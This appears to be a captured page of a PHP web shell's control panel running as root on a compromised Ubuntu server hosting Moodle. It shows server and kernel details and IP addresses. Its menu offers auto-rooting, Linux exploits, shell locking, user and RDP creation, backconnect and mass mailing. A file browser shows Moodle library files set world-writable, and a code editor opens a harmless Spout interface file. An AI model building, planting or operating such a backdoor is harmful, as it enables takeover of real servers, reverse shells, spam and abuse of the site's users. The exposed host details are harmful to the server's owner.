Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
spout /
src /
Spout /
Reader /
[ HOME SHELL ]
Name
Size
Permission
Action
CSV
[ DIR ]
drwxrwxrwx
Common
[ DIR ]
drwxrwxrwx
Exception
[ DIR ]
drwxrwxrwx
ODS
[ DIR ]
drwxrwxrwx
Wrapper
[ DIR ]
drwxrwxrwx
XLSX
[ DIR ]
drwxrwxrwx
IteratorInterface.php
257
B
-rwxrwxrwx
ReaderAbstract.php
7.66
KB
-rwxrwxrwx
ReaderInterface.php
813
B
-rwxrwxrwx
SheetInterface.php
614
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ReaderInterface.php
<?php namespace Box\Spout\Reader; /** * Interface ReaderInterface */ interface ReaderInterface { /** * Prepares the reader to read the given file. It also makes sure * that the file exists and is readable. * * @param string $filePath Path of the file to be read * @throws \Box\Spout\Common\Exception\IOException * @return void */ public function open($filePath); /** * Returns an iterator to iterate over sheets. * * @throws \Box\Spout\Reader\Exception\ReaderNotOpenedException If called before opening the reader * @return \Iterator To iterate over sheets */ public function getSheetIterator(); /** * Closes the reader, preventing any additional reading * * @return void */ public function close(); }
Close